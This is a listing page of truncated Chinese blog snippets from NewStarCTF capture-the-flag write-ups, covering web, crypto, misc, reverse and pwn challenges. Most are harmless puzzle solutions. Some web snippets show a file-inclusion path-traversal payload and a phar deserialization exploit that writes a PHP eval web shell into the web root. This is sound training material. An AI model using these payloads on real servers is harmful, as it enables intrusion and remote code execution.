- 2024-08-02NewStarCTF WEEK5|WEB 4-复盘
打开题目研究一圈没啥营养价值下载源码发现好东西if(file_exists($page)){require_once$page;}else{require_once'pages/error_page.php';}活的文件包含我们直接利用?+config-create+/&page=../../../../../usr/l
- 2024-08-02NewStarCTF WEEK5|WEB pppython?
对源码进行简单的分析<?php//检查`hint`请求参数是否等于指定的数组值if($_REQUEST['hint']==["your?","mine!","hint!!"]){//如果条件满足,设置响应内容类型为纯文本header("Content-type:text/plain");//执行系统命令`ls/-la`列出
- 2024-08-02NewStarCTF WEEK4|WEB PharOne
首先进入后查看源码进入class.php看见unlike很明显是一个phar反序列化的利用我们有两种选择一一句话木马<?phpclassFlag{public$cmd;}$a=newFlag();$a->cmd="echo\"<?=@eval(\\\$_POST['a']);\">/var/www/html/1.php";$phar=newPhar("
- 2024-05-10NewStarCTF 2023 week1 writeup
NewStarCTF2023week1writeup花了几天时间,终于把week1的题目做完了,还是学到不少东西的,题目质量大多都挺高的,很适合新手入门。Web1.泄漏的秘密url/robots.txt查看robots协议,找到第一部分的flagPARTONE:flag{r0bots_1s_s0_us3fulurl/www.zip查看网站备份,找到第二部分的fla
- 2024-04-28[NewStarCTF] UnserializeOne __clone魔术方法
今天来个反序列化没见过的魔术方法__clone。先看源码:点击查看代码classStart{public$name;protected$func;publicfunction__destruct(){echo"WelcometoNewStarCTF,".$this->name;}publicfunction__isset($var){
- 2024-04-26[NewStarCTF]flask disk debug模式下的漏洞
打开环境,发现三个链接/list/upload/console,题目描述为flask,那就是与flask的debug模式相关的漏洞,在此之前我只听过debug的pin码漏洞,也就是关于pin码的生成的。这里提一下:点击查看代码pin码的生成取决于下面这几个因素:1.服务器运行flask所登录的用户名。2.modname2.geta
- 2024-04-01NewStarCTF-firstweek
一、Crypto-brainfuck1.附件内容如下。++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>+++++
- 2024-03-31NewStarCTF(Reserve) WEEK1
easy_RE咳有UPX壳,先脱壳enc="gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~"flag=''foriinenc:b=(ord(i)-1)flag+=chr(b)print(flag)#flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}Segmentssegments用sh
- 2024-03-31NewStarCTF-thirdweek
一、阳光开朗大男孩1.题目给出了secret.txt和flag.txt两个文件,secret.txt内容如下:法治自由公正爱国公正敬业法治和谐平等友善敬业法治富强公正民主法治和谐法治和谐法治法治公正友善敬业法治文明公正自由平等诚信平等公正敬业法治和谐平等友善敬业法治和谐和谐富强和谐富强和谐
- 2024-03-31NewStarCTF-secondweek
一、新建Word文档1.doc文档隐写,将如图所示的设置打开,即可看到文字。2.新佛曰加密,在线网站解密。(http://hi.pcmoe.net/buddha.html)二、永不消逝的电波1.附件是个音频,audacity打开,可以看到明显的长短波。2.莫斯密码解密即可。源报文:..-./.-../.-/--./-/...././-..././.../
- 2024-03-31NewStarCTF-fourthweek
一、R通大残下载附件后发现图片最上面有一行色块:编写脚本提取出第一行像素色块的RGB值:fromPILimportImageimage=Image.open('secret.png')pixels=image.load()width,height=image.sizeforxinrange(width):r,g,b=pixels[x,0]print(f"
- 2024-03-31NewStarCTF-firstweek
一、Crypto-brainfuck1.附件内容如下。++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>+++++
- 2024-03-31NewStarCTF-fifthweek
一、隐秘的图片给出了两张图片,像是二维码,但是其中一张图片是损坏的,因此想到使用Stegsolve对两张图片进行异或:异或得到一张新的二维码,扫描获得Flag:二、ezhard拿到文件之后发现是硬盘格式文件新建目录挂载flag在hint.png三、新建Python文件pyc文件隐写很容易就能找
- 2024-03-08NewStarCTF 2023 公开赛道 做题随笔(WEEK1|MISC部分)
第一题下载打开得到TXT文件好的看样子应该是base32,复制到base在线转换看看得到这玩意 base58转换得到 出了flag 第二题 下载得到一张二维码用隐写软件试试得到一张这个以为是摩斯密码,试试得到有个这玩意,嘶,好像不是试试LSB 得到flag 第三题
- 2023-10-29NewStarCTF 2023 公开赛道 WEEK4|MISC 部分WP
R通大残1、题目信息R通大残,打了99,补!2、解题方法仔细分析题目,联想到隐写的R通道。首先解释一下:R是储存红色的通道,通道里常见有R(红)、G(绿)、B(蓝)三个通道,如果关闭了R通道图片就没有红色的部分,G、B同理。因此我们想到R大残应该是不显示红色了,猜测结果就在R通道里,所以使用Stegsolv
- 2023-10-22NewStarCTF 2023 公开赛道 Week3
官方WPhttps://shimo.im/docs/QPMRxzGktzsZnzhz/readNewStarCTF2023Week3官方WriteUp.htmlCryptoRabin'sRSA参考博客:RSA攻击之Rabin密码体制_rsarabin-CSDN博客使用轩禹一把梭了Misc阳光开朗大男孩社会主义核心价值观https://ctf.bugku.com/tool/cvecode解码得
- 2023-10-20NewStarCTF 2023 公开赛道 WEEK2|CRYPTO全解
一、滴啤题目信息fromCrypto.Util.numberimport*importgmpy2fromflagimportflagdefgen_prime(number):p=getPrime(number//2)q=getPrime(number//2)returnp,qm=bytes_to_long(flag.encode())p,q=gen_prime(1024)print(p*q)e=65537d
- 2023-10-20NewStarCTF 2023 公开赛道 WEEK1|CRYPTO全解
一、brainfuck附件信息++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>+++++++++++++++++
- 2023-09-18[Writeup]2022 NewstarCTF_Week5(Web部分)
一只网络安全菜鸟--(˙<>˙)/--写博客主要是想记录一下自己的学习过程,过两年毕业了也能回头看看自己都学了些啥东西。由于本人水平有限内容难免有错误、疏漏、逻辑不清、让人看不懂等各种问题,恳请大家批评指正如果我写的东西能对你有一点点帮助,那真是再好不过了。2023Newsta
- 2023-09-10[Writeup]2022 NewstarCTF_Week2(Web部分)
一只网络安全菜鸟--(˙<>˙)/--写博客主要是想记录一下自己的学习过程,过两年毕业了也能回头看看自己都学了些啥东西。由于本人水平有限内容难免有错误、疏漏、逻辑不清、让人看不懂等各种问题,恳请大家批评指正如果我写的东西能对你有一点点帮助,那真是再好不过了
- 2023-06-19BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
文章目录WEEK2WEBWord-For-You(2Gen)IncludeOneUnserializeOneezAPIMISCYesecnodrumsticks2Coldwinds'sDesktop奇怪的二维码qsdz'sgirlfriend2WEEK2WEBWord-For-You(2Gen)题目描述哇哇哇,我把查询界面改了,现在你们不能从数据库中拿到东西了吧哈哈(不过为了调试的代码似乎忘
- 2022-12-14NewStarCTF-WEEK1-Crypto-ezrsa复现
2022-NewStar-Week1-ezrsa复现题干assertlen(flag)%5==0cnt=len(flag)//5flags=[flag[cnt*i:cnt*(i+1)]foriinrange(5)]可知flag分五段。第一段m
- 2022-10-19NewStarCTF-WEEK4-周报
目录WEEK4周报canary常见的Canary绕过方式泄露程序地址/栈地址buupwn1_sctf_2016思路jarvisoj_level0思路[第五空间2019决赛]PWN5思路ciscn_2019_n_8思路jarvisoj_level2
- 2022-10-18NewStarCTF 2022
NewStarWEB我真的会谢提示:Flaghasthreepart,qsdzhidthemindifferentfiles.Bytheway,thesefilesaresensitive.<!--IusedVIMtowritethisfile,b
- 2022-10-13NewStarCTF WEEK3
WEEK3目录WEEK3catflag竞态条件和数据竞争sheepaflagread&writereturntocsubuurip题解思路warm_up思路ciscn_2019思路catflag竞态条件和数据竞争 竞态条件:强